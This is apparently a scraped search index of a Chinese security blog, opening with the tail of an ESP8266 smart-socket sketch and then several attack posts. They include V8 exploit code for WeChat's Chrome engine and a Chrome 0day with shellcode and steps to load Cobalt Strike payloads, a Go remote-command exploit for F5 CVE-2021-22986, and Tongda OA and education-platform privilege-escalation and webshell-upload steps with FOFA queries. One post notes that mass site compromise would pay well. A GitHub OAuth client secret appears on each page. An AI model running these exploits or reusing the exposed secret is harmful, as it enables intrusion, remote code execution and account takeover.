Button1.print("on"); } if (state == "off") { digitalWrite(Socket1, LOW); Button1.print("off"); }}void button2_callback(const String & state) //点灯app内控制按键触发{ BLINKER_LOG("get button state: ", state); if (state == "on") { digitalWrite(Socket2, HIGH); Button2.print("on"); } if (state == "off") { digitalWrite(Socket2, LOW); Button2.print("off"); }}void button3_callback(const String & state) //点灯app内控制按键触发{ BLINKER_LOG("get button state: ", state); if (state == "on") { digitalWrite(Socket3, HIGH); Button3.print("on"); } if (state == "off") { digitalWrite(Socket3, LOW); Button3.print("off"); }}void button4_callback(const String & state) //点灯app内控制按键触发{ BLINKER_LOG("get button state: ", state); if (state == "on") { digitalWrite(Socket4, HIGH); Button4.print("on"); } if (state == "off") { digitalWrite(Socket4, LOW); Button4.print("off"); }}void setup() { // 初始化串口 Serial.begin(115200);#if defined(BLINKER_PRINT) BLINKER_DEBUG.stream(BLINKER_PRINT);#endif // 初始化有LED的IO pinMode(Socket1, OUTPUT); digitalWrite(Socket1, LOW); pinMode(Socket2, OUTPUT); digitalWrite(Socket2, LOW); pinMode(Socket3, OUTPUT); digitalWrite(Socket3, LOW); pinMode(Socket4, OUTPUT); digitalWrite(Socket4, LOW);//初始化输出低电平 pinMode(LED_BUILTIN, OUTPUT); WIFI_Set(); // 初始化blinker Blinker.begin(auth, WiFi.SSID().c_str(), WiFi.psk().c_str()); Button1.attach(button1_callback);//注册按键回调函数 Button2.attach(button2_callback); Button3.attach(button3_callback); Button4.attach(button4_callback); BlinkerMIOT.attachPowerState(miotPowerState); // BlinkerMIOT.attachPowerState(miotPowerState); digitalWrite(LED_BUILTIN, HIGH);}int i=0;void loop() { Blinker.run(); if(OnorOff == 0) { } else if(OnorOff == 1)//如果是ON状态 { delay(1500); if(Feedback < 5)//小于5 是单独控制 1-4 { Set_Butt(Feedback);//反馈1-4 OnorOff = 0; }else if(Feedback == 5)//等于5 是打开所有然后1.2s每个的速度反馈所有 { if(millis() - F_time >=1200) { F_time = millis(); i++; Set_Butt(i); i%=4; if(i == 0) //当所有状态反馈完毕则退出 { Feedback = 0; OnorOff = 0; } } } } else if(OnorOff == 2) { delay(1500); if(Feedback < 5)//小于5 是单独控制 1-4 { Reset_Butt(Feedback);//反馈1-4 OnorOff = 0; }else if(Feedback == 5)//等于5 是 关闭 所有然后1.2s每个的速度反馈所有 { if(millis() - F_time >=1200) { F_time = millis(); i++; Reset_Butt(i); i%=4; if(i == 0) //当所有状态反馈完毕则退出 { Feedback = 0; OnorOff = 0; } } } }} var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"微信3.2.11.151Google内核poc利用上线","slug":"微信3-2-11-151Google内核poc利用上线","date":"2021-09-17T13:08:11.000Z","updated":"2021-09-17T13:08:52.670Z","comments":true,"path":"2021/09/17/微信3-2-11-151Google内核poc利用上线/","link":"","permalink":"http://bo.vuvhz.top/2021/09/17/%E5%BE%AE%E4%BF%A13-2-11-151Google%E5%86%85%E6%A0%B8poc%E5%88%A9%E7%94%A8%E4%B8%8A%E7%BA%BF/","excerpt":"","text":"[转发]微信最新版本3.2.11.151 Google内核poc利用上线cs方式!微信对版本进行了紧急更新,但是忽略了小程序,依旧可执行shellcode!用的小程序上线的微信,最新版的 1<web-view src="https://www.baidu.com"> </web-view> 测试页面进行上线测试 最新版本的微信 POC没变这里大佬是index.html 引用js代码: 1<script src="test.js"></script> poc代码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154ENABLE_LOG = true;IN_WORKER = true;// run calc and hang in a loopvar shellcode = [0x11,0x00,0x21];//前面是例子shellcode替换成自己的 注意是x86的 生成C语言 shellcode 将\\换成“,0” 全部替换后删除首部“,”!function print(data) {}var not_optimised_out = 0;var target_function = (function (value) { if (value == 0xdecaf0) { not_optimised_out += 1; } not_optimised_out += 1; not_optimised_out |= 0xff; not_optimised_out *= 12;});for (var i = 0; i < 0x10000; ++i) { target_function(i);}var g_array;var tDerivedNCount = 17 * 87481 - 8;var tDerivedNDepth = 19 * 19;function cb(flag) { if (flag == true) { return; } g_array = new Array(0); g_array[0] = 0x1dbabe * 2; return 'c01db33f';}function gc() { for (var i = 0; i < 0x10000; ++i) { new String(); }}function oobAccess() { var this_ = this; this.buffer = null; this.buffer_view = null; this.page_buffer = null; this.page_view = null; this.prevent_opt = []; var kSlotOffset = 0x1f; var kBackingStoreOffset = 0xf; class LeakArrayBuffer extends ArrayBuffer { constructor() { super(0x1000); this.slot = this; } } this.page_buffer = new LeakArrayBuffer(); this.page_view = new DataView(this.page_buffer); new RegExp({ toString: function () { return 'a' } }); cb(true); class DerivedBase extends RegExp { constructor() { super( { toString: cb }, 'g' ); this_.buffer = new ArrayBuffer(0x80); g_array[8] = this_.page_buffer; } } var derived_n = eval(`(function derived_n(i) { if (i == 0) { return DerivedBase; } class DerivedN extends derived_n(i-1) { constructor() { super(); return; ${"this.a=0;".repeat(tDerivedNCount)} } } return DerivedN; })`); gc(); new (derived_n(tDerivedNDepth))(); this.buffer_view = new DataView(this.buffer); this.leakPtr = function (obj) { this.page_buffer.slot = obj; return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt); } this.setPtr = function (addr) { this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt); } this.read32 = function (addr) { this.setPtr(addr); return this.page_view.getUint32(0, true, ...this.prevent_opt); } this.write32 = function (addr, value) { this.setPtr(addr); this.page_view.setUint32(0, value, true, ...this.prevent_opt); } this.write8 = function (addr, value) { this.setPtr(addr); this.page_view.setUint8(0, value, ...this.prevent_opt); } this.setBytes = function (addr, content) { for (var i = 0; i < content.length; i++) { this.write8(addr + i, content[i]); } } return this;}function trigger() { var oob = oobAccess(); var func_ptr = oob.leakPtr(target_function); print('[*] target_function at 0x' + func_ptr.toString(16)); var kCodeInsOffset = 0x1b; var code_addr = oob.read32(func_ptr + kCodeInsOffset); print('[*] code_addr at 0x' + code_addr.toString(16)); oob.setBytes(code_addr, shellcode); target_function(0);}try{ print("start running"); trigger();}catch(e){ print(e);} 仅用于学习,请不要用于违法犯罪!!!! var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"cs批量爆破","slug":"cs批量爆破","date":"2021-09-17T13:04:28.000Z","updated":"2021-09-17T13:05:28.274Z","comments":true,"path":"2021/09/17/cs批量爆破/","link":"","permalink":"http://bo.vuvhz.top/2021/09/17/cs%E6%89%B9%E9%87%8F%E7%88%86%E7%A0%B4/","excerpt":"","text":"cs密码批量爆破显ip显示的更清楚 链接:https://pan.baidu.com/s/1Ht_SCsTIeZM7w-GS8hrhkQ提取码:1234复制这段内容后打开百度网盘手机App,操作更方便哦 之前改的大佬的没有显示ip,然后把ip显示了出来,就不用一个一个去找ip了,结合了单ip破解和多ip破解,ip.txt放ip,pass.txt放密码,结合fofa语句 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"google-0day","slug":"google-0day","date":"2021-04-19T08:38:46.000Z","updated":"2021-04-19T08:42:48.619Z","comments":true,"path":"2021/04/19/google-0day/","link":"","permalink":"http://bo.vuvhz.top/2021/04/19/google-0day/","excerpt":"","text":"Cobalt Strike 利用 Chrome 0day 上线c x64POC (弹记事本的): 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103<script> function gc() { for (var i = 0; i < 0x80000; ++i) { var a = new ArrayBuffer(); } } let shellcode = [0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52, 0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED, 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44, 0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48, 0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44, 0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49, 0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41, 0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF, 0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x6E, 0x6F, 0x74, 0x65, 0x70, 0x61, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00]; var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]); var wasmModule = new WebAssembly.Module(wasmCode); var wasmInstance = new WebAssembly.Instance(wasmModule); var main = wasmInstance.exports.main; var bf = new ArrayBuffer(8); var bfView = new DataView(bf); function fLow(f) { bfView.setFloat64(0, f, true); return (bfView.getUint32(0, true)); } function fHi(f) { bfView.setFloat64(0, f, true); return (bfView.getUint32(4, true)) } function i2f(low, hi) { bfView.setUint32(0, low, true); bfView.setUint32(4, hi, true); return bfView.getFloat64(0, true); } function f2big(f) { bfView.setFloat64(0, f, true); return bfView.getBigUint64(0, true); } function big2f(b) { bfView.setBigUint64(0, b, true); return bfView.getFloat64(0, true); } class LeakArrayBuffer extends ArrayBuffer { constructor(size) { super(size); this.slot = 0xb33f; } } function foo(a) { let x = -1; if (a) x = 0xFFFFFFFF; var arr = new Array(Math.sign(0 - Math.max(0, x, -1))); arr.shift(); let local_arr = Array(2); local_arr[0] = 5.1;//4014666666666666 let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8 arr[0] = 0x1122; return [arr, local_arr, buff]; } for (var i = 0; i < 0x10000; ++i) foo(false); gc(); gc(); [corrput_arr, rwarr, corrupt_buff] = foo(true); corrput_arr[12] = 0x22444; delete corrput_arr; function setbackingStore(hi, low) { rwarr[4] = i2f(fLow(rwarr[4]), hi); rwarr[5] = i2f(low, fHi(rwarr[5])); } function leakObjLow(o) { corrupt_buff.slot = o; return (fLow(rwarr[9]) - 1); } let corrupt_view = new DataView(corrupt_buff); let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff); let idx0Addr = corrupt_buffer_ptr_low - 0x10; let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000; let delta = baseAddr + 0x1c - idx0Addr; if ((delta % 8) == 0) { let baseIdx = delta / 8; this.base = fLow(rwarr[baseIdx]); } else { let baseIdx = ((delta - (delta % 8)) / 8); this.base = fHi(rwarr[baseIdx]); } let wasmInsAddr = leakObjLow(wasmInstance); setbackingStore(wasmInsAddr, this.base); let code_entry = corrupt_view.getFloat64(13 * 8, true); setbackingStore(fLow(code_entry), fHi(code_entry)); for (let i = 0; i < shellcode.length; i++) { corrupt_view.setUint8(i, shellcode[i]); } main();</script> CS开启监听 监听器随意,https的稳定 生成payload 记得勾选64位 获得C的payload 类似这样 取出 shellcode 部分 全局替换 \\ 为 ,0 然后取出来shellcode 放入 chrome 0day 中 替换后 复制出来 放入文章开头的 POC 中 第7行 给shellcode 赋值数组 保存 成 msf.html chrome 浏览器 创建快捷方式到桌面 右键编辑快捷方式 增加 -no-sandbox 参数 关闭沙箱 在chrome浏览器打开 msf.html , CS 上线! payload c#weijs 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167ENABLE_LOG = true;IN_WORKER = true;// run calc and hang in a loopvar shellcode = [#shellcode];//shellcode替换成自己的 注意是x86的c#function print(data) {}var not_optimised_out = 0;var target_function = (function (value) { if (value == 0xdecaf0) { not_optimised_out += 1; } not_optimised_out += 1; not_optimised_out |= 0xff; not_optimised_out *= 12;});for (var i = 0; i < 0x10000; ++i) { target_function(i);}var g_array;var tDerivedNCount = 17 * 87481 - 8;var tDerivedNDepth = 19 * 19;function cb(flag) { if (flag == true) { return; } g_array = new Array(0); g_array[0] = 0x1dbabe * 2; return 'c01db33f';}function gc() { for (var i = 0; i < 0x10000; ++i) { new String(); }}function oobAccess() { var this_ = this; this.buffer = null; this.buffer_view = null; this.page_buffer = null; this.page_view = null; this.prevent_opt = []; var kSlotOffset = 0x1f; var kBackingStoreOffset = 0xf; class LeakArrayBuffer extends ArrayBuffer { constructor() { super(0x1000); this.slot = this; } } this.page_buffer = new LeakArrayBuffer(); this.page_view = new DataView(this.page_buffer); new RegExp({ toString: function () { return 'a' } }); cb(true); class DerivedBase extends RegExp { constructor() { // var array = null; super( // at this point, the 4-byte allocation for the JSRegExp `this` object // has just happened. { toString: cb }, 'g' // now the runtime JSRegExp constructor is called, corrupting the // JSArray. ); // this allocation will now directly follow the FixedArray allocation // made for `this.data`, which is where `array.elements` points to. this_.buffer = new ArrayBuffer(0x80); g_array[8] = this_.page_buffer; } } // try{ var derived_n = eval(`(function derived_n(i) { if (i == 0) { return DerivedBase; } class DerivedN extends derived_n(i-1) { constructor() { super(); return; ${"this.a=0;".repeat(tDerivedNCount)} } } return DerivedN; })`); gc(); new (derived_n(tDerivedNDepth))(); this.buffer_view = new DataView(this.buffer); this.leakPtr = function (obj) { this.page_buffer.slot = obj; return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt); } this.setPtr = function (addr) { this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt); } this.read32 = function (addr) { this.setPtr(addr); return this.page_view.getUint32(0, true, ...this.prevent_opt); } this.write32 = function (addr, value) { this.setPtr(addr); this.page_view.setUint32(0, value, true, ...this.prevent_opt); } this.write8 = function (addr, value) { this.setPtr(addr); this.page_view.setUint8(0, value, ...this.prevent_opt); } this.setBytes = function (addr, content) { for (var i = 0; i < content.length; i++) { this.write8(addr + i, content[i]); } } return this;}function trigger() { var oob = oobAccess(); var func_ptr = oob.leakPtr(target_function); print('[*] target_function at 0x' + func_ptr.toString(16)); var kCodeInsOffset = 0x1b; var code_addr = oob.read32(func_ptr + kCodeInsOffset); print('[*] code_addr at 0x' + code_addr.toString(16)); oob.setBytes(code_addr, shellcode); target_function(0);}try{ print("start running"); trigger();}catch(e){ print(e);} var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"金和协同水平越权漏洞","slug":"金和协同水平越权漏洞","date":"2021-04-04T03:43:29.000Z","updated":"2021-04-04T03:59:22.311Z","comments":true,"path":"2021/04/04/金和协同水平越权漏洞/","link":"","permalink":"http://bo.vuvhz.top/2021/04/04/%E9%87%91%E5%92%8C%E5%8D%8F%E5%90%8C%E6%B0%B4%E5%B9%B3%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"0day 3.28 金和协同管理OA平台. 水平越权漏洞此洞是由 goddmeon 师傅挖掘并授权发表。 在此感谢 goddmeon 师傅。 FoFA语法: body=”金和协同管理平台” && country=”CN” 默认口令 admin / 000000 后台登录水平越权 C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=想要的id用户 这个id指的是用户编号 登录,用过用户管理,看到用户编号0001为董事长 这是admin管理员权限登录的界面 为了验证水平越权漏洞,我们登录一个普通用户账号,下面是普通用户登录后的界面。 访问url: 12http://www.xxxxxxx.net/C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=0001 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"智慧教育越权","slug":"智慧教育越权","date":"2021-04-04T03:32:18.000Z","updated":"2021-04-04T03:33:37.215Z","comments":true,"path":"2021/04/04/智慧教育越权/","link":"","permalink":"http://bo.vuvhz.top/2021/04/04/%E6%99%BA%E6%85%A7%E6%95%99%E8%82%B2%E8%B6%8A%E6%9D%83/","excerpt":"","text":"智慧教育平台越权上传漏洞通杀拿webshell 1.fofa语法: 1/Widget/common/Service/CommonWidgetService.asmx/Categorylist 2.漏洞越权位置 1/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0 有的会提示输入账号密码,直接访问这个注册,就可以注册 1Module/SSO/SJS_Register.aspx 可以登录个人后台, 3.登录后可以重普通用户越权到admin管理员用户 4.在个人页面抓包可以发现以get方式传输 试试有没有注入或者越权就加个?id=123 ?user=miko没有注入。。。。 当把user换成admin时 既然到了admin里面,这里应该有admin的cookie吧,于是直接又登录之前的越权漏洞地址,应该能到管理员后台 5.成功了 6.找上传点改filetype标签不行,加了个aspx,改了个aspx,还是不行,于是直接抓包,掏出burp 7.传不了,图片可以传,但是aspx传的时候进度条不动,。。。。卡住了,于是做图片马aspx加图片,哦呦,进去了,但是访问后报错 于是找大佬问问,大佬也试了一下,大佬用的asp加图片,于是我也改asp加图片嘿嘿 8.成功拿下webshell 目前发现这套模板可以写个批量拿站脚本,日收益会很不错,有些这个模板已经修复了,但是查找的高达90%都有这些漏洞。 漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞 https://mp.weixin.qq.com/s?__biz=Mzg5NjU3NzE3OQ==&mid=2247484986&idx=1&sn=55c43e01fb9cce6962272045c263fd83&chksm=c07fbdcef70834d8869f57ebd926e4237fb4379b317ac7aaa271a68c20ce99a5b054c283c7df&mpshare=1&scene=23&srcid=0404byavRK4wQ0q01VcNxxQ5&sharer_sharetime=1617496800125&sharer_shareid=f18a0e6ff07a610f239caab878f64be5#rd var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"通达OA_v11.7文件上传","slug":"通达OA","date":"2021-03-23T13:38:16.000Z","updated":"2021-03-23T13:39:10.659Z","comments":true,"path":"2021/03/23/通达OA/","link":"","permalink":"http://bo.vuvhz.top/2021/03/23/%E9%80%9A%E8%BE%BEOA/","excerpt":"","text":"通达OA_v11.7 文件上传+文件包含 通达OA_v11.7 文件上传+文件包含1.任意用户登录 12/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 2.文件上传(后台) 123456789101112131415161718POST /general/reportshop/utils/upload.php?action=upload&newid=/../../../../general/reportshop/workshop/report/attachment-remark/ HTTP/1.1Host: 192.168.238.141Content-Length: 197Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk6YsCa9EZHcaYYulAccept: */*Accept-Encoding: gzip, deflateCookie:PHPSESSID=e30i0923fb8vol34kldc0sqhn7Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5Connection: close------WebKitFormBoundaryk6YsCa9EZHcaYYulContent-Disposition: form-data; name="FILE1"; filename="ceshi.txt"Content-Type: text/plainhello world------WebKitFormBoundaryk6YsCa9EZHcaYYul-- 3.文件包含(后台) 12/ispirit/interface/gateway.php?json={}&url=general/reportshop/workshop/report/attachment-remark/}_ceshi.txt 利用链已在工具中更新 相对于redis那条利用链, 可优先使用它 和其他版本一样, 获取cookie后点击”后台getshell”即可(会自动识别v11.7版本的) 圈子专版 链接:https://pan.baidu.com/s/1VIuJ-5dZ0ENtpvUTfI-Vmw提取码:rjhd GitHub项目地址https://github.com/xinyu2428/TDOA_RCE var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"CVE-2021-22986复现","slug":"CVE-2021-22986","date":"2021-03-23T13:34:37.000Z","updated":"2021-03-23T13:35:31.819Z","comments":true,"path":"2021/03/23/CVE-2021-22986/","link":"","permalink":"http://bo.vuvhz.top/2021/03/23/CVE-2021-22986/","excerpt":"","text":"CVE-2021-22986 复现数据包如下: 1234567891011POST /mgmt/tm/util/bash HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0)Accept: */*Connection: closeAuthorization: Basic YWRtaW46X-F5-Auth-Token: Content-Length: 46Content-Type: application/json{"command": "run", "utilCmdArgs": "-c id"} 工具使用 go 简单写一下,代码有点 low 下载地址:https://github.com/yuyan-sec/Poc-Project/tree/main/F5相关代码: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778package mainimport ( "fmt" "net/http" "io/ioutil" "crypto/tls" "time" "bytes" "regexp" "strings" "flag")func main(){ var host,cmd string flag.StringVar(&host,"u","","URL: http://127.0.0.1") flag.StringVar(&cmd,"c","","CMD: id") flag.Parse() if host == "" || cmd == ""{ fmt.Println(`███████╗███████╗ ██████╗ ██████╗███████╗██╔════╝██╔════╝ ██╔══██╗██╔════╝██╔════╝█████╗ ███████╗ ██████╔╝██║ █████╗ ██╔══╝ ╚════██║ ██╔══██╗██║ ██╔══╝ ██║ ███████║ ██║ ██║╚██████╗███████╗╚═╝ ╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝ CVE-2021-22986 Author: @yuyan-sec`) }else{ exp(host,cmd) }}func exp(url, cmd string){ t := &http.Transport{ TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, } c := &http.Client{ Transport: t, Timeout: 5 * time.Second, } url = strings.TrimRight(url,"/") url = url + "/mgmt/tm/util/bash" payload := []byte("{\\"command\\": \\"run\\", \\"utilCmdArgs\\": \\"-c "+ cmd +"\\"}") r, err := http.NewRequest("POST", url, bytes.NewBuffer(payload)) r.Header.Set("Content-Type", "application/json") r.Header.Set("X-F5-Auth-Token", "") r.Header.Set("Authorization", "Basic YWRtaW46") resp, err := c.Do(r) if err != nil{ return } defer resp.Body.Close() body, err := ioutil.ReadAll(resp.Body) if err != nil{ return } if resp.StatusCode == 200{ reg := regexp.MustCompile(`"commandResult":"(.*?)\\\\n`) commandResult := reg.FindAllStringSubmatch(string(body),-1) result := commandResult[0][1] result = strings.Replace(result,"context=system_u:system_r:initrc_t:s0","",-1) fmt.Println(result) }else{ fmt.Println("fail") }} [转]@yuyan大佬 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"MessageSolution邮件bug","slug":"MessageSolution","date":"2021-03-23T13:31:20.000Z","updated":"2021-03-23T13:32:43.615Z","comments":true,"path":"2021/03/23/MessageSolution/","link":"","permalink":"http://bo.vuvhz.top/2021/03/23/MessageSolution/","excerpt":"","text":"MessageSolution邮件归档系统EEA 信息泄露漏洞 Goby脚本编写简介:MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码. 搜索语法 1title="MessageSolution Enterprise Email Archiving (EEA)" 漏洞地址http://ip:port/authenticationserverservlet/漏洞验证 得到一个管理员的账户密码 一个用户的账户密码 Goby脚本编写 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859{ "Name": "MessageSolution-Information-leakage", "Level": "3", "Tags": [], "GobyQuery": "title=\\"MessageSolution Enterprise Email Archiving (EEA)\\"", "Description": "", "Product": "", "Homepage": "https://www.secquan.org/", "Author": "Jaky", "Impact": "", "Recommandation": "", "References": [ "https://www.secquan.org/" ], "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/authenticationserverservlet/", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "regex", "value": "username", "bz": "" }, { "type": "item", "variable": "$body", "operation": "regex", "value": "password", "bz": "" } ] }, "SetVariable": [] } ], "PostTime": "2021-03-23 08:44:36", "GobyVersion": "1.8.255"} 脚本存放脚本验证 [转]@Jaky大佬 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"phpstudy后门","slug":"phpstudy后门","date":"2021-03-09T10:57:47.000Z","updated":"2021-03-09T11:23:09.348Z","comments":true,"path":"2021/03/09/phpstudy后门/","link":"","permalink":"http://bo.vuvhz.top/2021/03/09/phpstudy%E5%90%8E%E9%97%A8/","excerpt":"","text":"#phpstudy后门利用创建靶机使用burp抓取数据包 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) 